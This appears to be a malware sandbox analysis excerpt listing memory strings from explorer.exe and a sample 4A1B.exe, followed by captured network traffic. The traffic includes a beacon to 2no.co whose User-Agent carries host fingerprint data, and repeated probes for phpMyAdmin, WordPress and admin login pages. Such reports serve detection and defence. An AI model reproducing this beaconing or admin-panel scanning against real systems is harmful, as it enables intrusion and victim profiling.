Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1796028449.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1796028449.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: 4A1B.exe, 0000000A.00000002.2409214052.00000000062BD000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000634A000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AAF000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C12000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063F3000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B42000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000063D7000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003A62000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000624B000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003CA8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003BDA000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.00000000062D8000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003C70000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.0000000006365000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003AE5000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2409214052.000000000622F000.00000004.00000800.00020000.00000000.sdmp, 4A1B.exe, 0000000A.00000002.2391907349.0000000003B7C000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2360680338.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1790741511.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1790741511.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown

DNS traffic detected: queries for: onualituyrs.org

Source: global traffic	HTTP traffic detected: GET /1oH5R HTTP/1.1Connection: Keep-AliveContent-Type: text/plain; Charset=UTF-8Accept: /User-Agent: WIN_10 X64 19045 \| Memory: 8.00 Gb \| Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\| Cores: 4 \| Videocard: RG6LH57X \| SmartScreen: YES \| Defender: NO \| Antivirus: NOHost: 2no.co
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: ia.euAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: san.eeAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gbya.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: il.cmAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: apee.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gcann.cr.co.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gmo.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: cm.czAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.88; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpmyadmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /administrator/index.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://96l.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://1.tv/wp-login.php
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://nrnet.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /phpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: 96l.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.77; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-login.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: 6ail.comAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=; caf_ipaddr=10.116.88.132; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://6ail.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: hna.beAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://gco.uk/wp-login.php
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.116.88.163; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /wp-admin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0Referer: https://z-a.com/wp-login.php
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: gco.ukAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /pma/ HTTP/1.1Host: www.noweco.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /PhpMyAdmin/ HTTP/1.1Host: z-a.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin.php HTTP/1.1Host: nrnet.comAccept: /Accept-Encoding: deflate, gzipUser-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Source: global traffic	HTTP traffic detected: GET /admin HTTP/1.1Host: 1.tvAccept: /Accept-Encoding: deflate, gzipCookie: expiry_partner=enom.ACTIVE.5D3C3A1B-1A26-48DD-A7EC-02F11DDF874F; caf_ipaddr=10.119.144.89; country=; city=""User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
